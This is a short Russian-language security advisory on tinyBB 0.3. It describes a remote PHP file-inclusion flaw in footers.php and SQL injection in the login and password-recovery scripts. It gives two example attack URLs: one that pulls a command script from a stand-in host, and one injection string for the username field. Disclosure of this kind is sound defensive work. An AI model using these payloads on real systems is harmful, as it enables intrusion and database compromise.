Программа: tinyBB 0.3, возможно другие версии.
Обнаруженные уязвимости позволяют удаленному пользователю произвести SQL-инъекцию и выполнить произвольный PHP сценарий на целевой системе.
1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "tinybb_footers" в сценарии footers.php. Удаленный пользователь может выполнить произвольный PHP-сценарий на целевой системе. Для успешной эксплуатации уязвимости опция "register_globals" должна быть включена.
Пример:
http://[victim]/[tBBPath]/footers.php?tinybb_footers= http://yourhost.com/cmd.txt?
2. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "username" и "password" в сценарии login_form.php, и параметре "q" в сценарии forgot.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc" должны быть отключена.
Пример:
http://[victim]/[tBBPath]/login.php?username=heh/**/ or/**/isnull(1/0)/*&password=nothing
